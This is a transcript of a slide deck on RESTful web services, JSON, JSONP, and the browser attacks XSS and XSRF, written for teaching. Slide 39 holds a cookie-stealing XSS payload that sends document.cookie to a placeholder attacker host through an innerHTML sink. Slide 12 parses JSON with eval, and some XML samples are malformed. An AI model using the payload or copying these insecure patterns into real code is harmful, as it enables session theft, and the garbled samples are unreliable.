Presentation is loading. Please wait.

Presentation is loading. Please wait.

By Loukik Purohit & Rohit Ghatol

Similar presentations


Presentation on theme: "By Loukik Purohit & Rohit Ghatol"— Presentation transcript:

1 By Loukik Purohit & Rohit Ghatol
Restful Web Services By Loukik Purohit & Rohit Ghatol

2 Web Service Browser Messages(xml/json ) Desktop CricInfo Mobile

3 Using Browser User Intervention Cab Booking Plane Booking
Hotel Booking Vacation Subsystem User Intervention

4 Automated Machines interacting with each other Cab Booking
Plane Booking SMS/ Hotel Booking Vacation Subsystem Machines interacting with each other

5 Rest in terms of Layman HR Accounts Admin

6 Organized structure To get address of user 1 , go to : \Organisation\Users\1\address

7 Same analogy applies to Web
Request to get all users Request to get user 1 Request to get address of user 1

8 Request-Response GET Response <users> <id>1</id>
<name>Loukik</address> <address>Pune</address> <skill>java</skill> </id> <id>2</id> <name>...</address> <address>…</address> <skill>…</skill> </users> GET Request GET /users/1 HTTP/1.1 Host: xyz.com Accept: application/xml

9 Request-Response POST Response
POST Request GET /users HTTP/1.1 Host: xyz.com Content Type: application/xml Accept: application/xml <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users> POST Response <result> <id>3</id> </result>

10 HTTP http://xyz.com/services/users HTTP Headers Method:PUT
Accept:application/xml Content-Type:application/xml HTTP Body <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users>

11 Four verbs for every noun
GET POST DELETE PUT

12 JSON Can Data be Represented in form of List and a Map?? Here’s JSON
var myObject = eval('(' + myJSONtext + ')');

13 JSON Parser

14 How JSON looks like Accessing json in javascript code
var result= { "users":[{ "id":"1", "name":"loukik", "address":"Pune", "skill":"java" }, { "id":"2", "name":"rohit", "skill":"C++“ } ] Accessing json in javascript code result.users[0].name=“loukik”

15 REST

16 Your Source to 3000+ Web Service APIs
Programmable Web Your Source to Web Service APIs

17 programmableweb.com

18 Implement Restful Webservice
Write a Servlet Implement doGet, doPost, doDelete Write business logic Create your Messages, that too JSON

19 JAX-RS To rescue Marrying to API EJB Servlet
Being POJO (Single) is Great! JAX-RS

20 JAX-RS JSR 311: JAX-RS More info at

21 JAXB-@XMLRootElement
JAX-RS Flow HTTP Request JSON POJO Model JAX-RS Servlet Business Logic HTTP Response POJO Model JSON

22 Spring REST Based on Spring MVC

23 Spring REST Negotiated view-based rendering HTTP message converters

24 Enunciate Enunciate Your Web service API Your Web service API
Full HTML documentation + Client-side libraries Enunciate

25 What does Enunciate do for me?
Java Doc C JAX-RS ObjC POJO Client SOAP Comm .Net GWT AMF Java Json What does Enunciate do for me?

26 Enunciate Enunciate is an engine for dramatically enhancing your Java Web service API. Enunciate is primarily a build-time tool. Develop your Web service API. Attach Enunciate to your build process.

27 Cross Site Scripting Single Origin Policy http://geochirp.com
maps.google.com Ajax Calls twitter.com

28 Single Origin Policy Imposed by Browser Ajax Restrictions
Accessing iFrame’s DOM ABC.com JavaScript Iframe XYZ.com

29 So How to do Mashups? Use Proxy http://geochirp.com/proxy
maps.google.com twitter.com

30 So How to do Mashups? Use JSONP http://geochirp.com maps.google.com
JSONP Call twitter.com JSONP Call

31 AJAX Call Not Allowed By Browser
What is JSONP? ABC.com ABC.com Static Script XYZ.com XYZ.com JS Including Scripts hosted on other domains is allowed AJAX Call Not Allowed By Browser

32 AJAX Call Not Allowed By Browser
What is JSONP? ABC.com ABC.com Dynamic Script XYZ.com XYZ.com JS Including Scripts hosted on other domains is allowed AJAX Call Not Allowed By Browser

33 JSONP Explained Single Origin Policy No Such Restriction
JSON JSONP { "id":"1", "name":"loukik", "address":"Pune", "skill":"java“ } myfunc({ "id":"1", "name":"loukik", "address":"Pune", "skill":"java“ }); Single Origin Policy No Such Restriction

34 JSONP Code Example

35 <html> <head> <script> function myfunc(data){ table
<html> <head> <script> function myfunc(data){ table.update(data); } </script> </head> <body> <table> <!-- employee table --> <tr><td>Name </td><td> Address </td><td> Role</td></tr> <tr><td>Rohit </td><td> Pune </td><td> Architect</td></tr> <tr><td>Loukik </td><td> Pune </td><td>Geek</td></tr> </table> <button id="add employee" >Add </button> <button id="next100" >NExt 100</button> <script src="http://xyz.com/services/fetchemployess?page=1&jsonp=myfunc"></script> </body> </html>

Name Address Role
Rohit Pune Architect
Loukik Pune Geek
", "width": "800" }

36 XSS Attacker Hacked!!! ScrapBook WebSite User
<script> attack script</script> Login Hacked!!! ScrapBook WebSite User Login. Hacked!!! ScrapBook WebSite. User.", "width": "800" }

37

38 How to do XSS? Server needs an XSS Vulnerability
What if I put an html with some JavaScript here? Server needs an XSS Vulnerability Say Dev uses div.innerHTML in code TextArea function postScrap(){ div.innerHTML = textarea.value; } Post DIV

39 How to do XSS? Server needs an XSS Vulnerability
Say Dev uses div.innerHTML in code <h1>Look at this cool image</h1> <img src='http://hack.com/?cookie=" + encodeURI(document.cookie)'> </img> function postScrap(){ div.innerHTML = textarea.value; }

40 XSRF Cross Site Request Forgery.
Unauthorized commands are transmitted from a user that the website trusts. Exploits the trust that a site has in a user's browser.

41 XSRF User ScrapBook WebSite Hacked!!! Attacker Login Opens Mail
Send Mail with Script ScrapBook WebSite Hacked!!! Attacker

42 How to do XSRF Is it Possible?
Browser holds your sessions What if I made you visit a page which uses your session to do hack? Is it Possible?

43 Aye Mate! How come I can use Google + and Facebook Like here?


Download ppt "By Loukik Purohit & Rohit Ghatol"

Similar presentations


Ads by Google